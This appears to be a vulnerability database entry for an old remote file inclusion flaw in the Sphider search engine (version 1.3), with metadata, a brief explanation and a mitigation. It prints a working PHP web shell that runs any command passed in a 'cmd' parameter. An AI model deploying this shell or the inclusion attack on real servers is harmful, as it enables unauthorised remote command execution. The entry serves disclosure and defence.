vendor:
Sphider
by:
rgod
7.5
CVSS
HIGH
Arbitrary Remote Inclusion
94
CWE
Product Name: Sphider
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2006
Sphider <= 1.3 arbitrary remote inclusion
Sphider <= 1.3 is vulnerable to arbitrary remote inclusion. This exploit works with register_globals = On & allow_url_fopen = On. The exploit requires a code to be included in the remote location which is then used to execute the command. The code is as follows: <?php ob_clean();if (get_magic_quotes_gpc()){$_GET["cmd"]=stripslashes($_GET["cmd"]);}ini_set("max_execution_time",0);echo 56789;passthru($_GET["cmd"]);die;?>
Mitigation:
Disable register_globals and allow_url_fopen in php.ini